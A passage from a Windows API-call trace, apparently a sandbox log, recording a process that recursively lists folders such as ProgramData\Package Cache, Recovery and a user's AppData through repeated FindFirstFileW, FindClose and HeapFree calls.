lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.108] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.108] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.108] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.108] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.108] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.108] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.108] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.109] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.109] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.110] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.110] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32ae8 [0140.111] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.111] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.111] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.111] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.111] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.112] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.112] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.113] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.113] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.113] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.114] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.114] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.114] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.114] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.114] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.115] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.115] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.116] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.116] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.116] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.116] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.117] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.117] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.118] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.118] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.118] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.118] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.119] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.119] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.119] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.120] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.120] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.120] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.120] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.121] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.121] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.121] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.121] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.121] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.122] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.122] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.122] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.122] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.123] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.123] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.123] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.123] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.123] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.124] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.124] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.124] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa328a8 [0140.125] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa32a68 [0140.125] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32aa8 [0140.126] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.126] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.126] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.126] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.126] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.127] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.251] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa32a28 [0140.251] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328a8 [0140.251] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32a68 [0140.251] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.252] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.252] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.252] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.252] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.252] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.253] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa32a28 [0140.254] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328a8 [0140.254] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32a68 [0140.254] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.254] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.254] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.254] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.254] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.254] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa32a28 [0140.256] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328a8 [0140.256] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32a68 [0140.256] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.256] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.256] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.256] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.256] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.256] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.257] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa32a28 [0140.258] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328a8 [0140.258] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32a68 [0140.258] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.258] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.258] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.258] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.258] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.259] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.259] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa32a28 [0140.260] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.260] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.260] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa32a28 [0140.260] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328a8 [0140.261] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32a68 [0140.261] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.263] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.263] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.263] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.263] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.263] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.264] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa32a28 [0140.265] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328a8 [0140.265] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32a68 [0140.265] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.265] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.265] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.266] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.266] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.266] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa32a28 [0140.267] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.267] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa32a28 [0140.267] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.267] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.268] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa32a28 [0140.268] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.268] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.268] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa32a28 [0140.269] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328a8 [0140.269] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32a68 [0140.269] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.269] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.269] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.269] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.269] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.269] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.270] FindClose (in: hFindFile=0xa32868 | out: hFindFile=0xa32868) returned 1 [0140.270] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0140.271] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Start Menu\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xffffffff [0140.271] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.273] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa32868 [0140.273] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa32a28 [0140.274] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328a8 [0140.274] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.274] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.274] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.274] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.274] FindClose (in: hFindFile=0xa32868 | out: hFindFile=0xa32868) returned 1 [0140.274] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.275] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Templates\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xffffffff [0140.275] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.275] FindClose (in: hFindFile=0xa32828 | out: hFindFile=0xa32828) returned 1 [0140.276] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2287a78 | out: hHeap=0x20f0000) returned 1 [0140.276] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\*", lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 0xa32828 [0140.276] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa32868 [0140.276] FindClose (in: hFindFile=0xa32868 | out: hFindFile=0xa32868) returned 1 [0140.276] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.276] FindClose (in: hFindFile=0xa32828 | out: hFindFile=0xa32828) returned 1 [0140.276] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2287a78 | out: hHeap=0x20f0000) returned 1 [0140.276] FindFirstFileW (in: lpFileName="\\\\?\\C:\\System Volume Information\\*", lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 0xffffffff [0140.277] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2287a78 | out: hHeap=0x20f0000) returned 1 [0140.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 0xa32828 [0140.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa32868 [0140.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa32a28 [0140.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x2b4eee8 | out: lpFindFileData=0x2b4eee8) returned 0xa328a8 [0140.278] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32a68 [0140.279] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0140.279] FindFirstFileW (in: 